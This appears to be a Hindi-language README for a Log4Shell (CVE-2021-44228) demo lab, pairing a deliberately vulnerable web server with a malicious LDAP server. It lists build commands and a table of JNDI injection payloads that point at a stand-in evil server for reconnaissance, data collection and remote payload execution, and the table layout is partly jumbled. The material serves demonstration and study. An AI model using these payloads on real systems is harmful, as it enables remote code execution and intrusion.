
Log4Shell (CVE-2021-44228) भेद्यता का एक डेमो।
Log4Shell (CVE-2021-44228) भेद्यता का एक डेमो।
कमजोर वेबसर्वर और दुर्भावनापूर्ण LDAP सर्वर दोनों को JDK 1.8.0_181 पर बनाया और परीक्षण किया गया था।
goodguys के अंदर, gradlew bootJar चलाएँjava -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar का उपयोग करके कमजोर वेबसर्वर चलाएँbadguys के अंदर, mvn package चलाएँjava -jar .\target\evil-server.jar का उपयोग करके दुष्ट सर्वर चलाएँनोट: Windows Defender चुपचाप
target\classes\Exploit.classको क्वारंटाइन में भेज सकता है।
दुर्भावनापूर्ण कमांड Exploit.java के अंदर परिभाषित हैं।
| इनपुट | टिप्पणियाँ |
|---|---|
${jndi:ldap://evil-server-hostname:389/Recon} | LDAP सर्वर पर कनेक्शन अनुरोध को सुनकर जाँचता है कि लक्ष्य कमजोर है या नहीं। |
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)] | लक्ष्य से डेटा एकत्र करने और हमलावर के टर्मिनल में प्रदर्शित करने के लिए कोई भी मान्य log4j पैटर्न लेआउट जोड़ें। |
${jndi:ldap://evil-server-hostname:389/Exploit} |
https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/
| पेलोड चलाएँ। |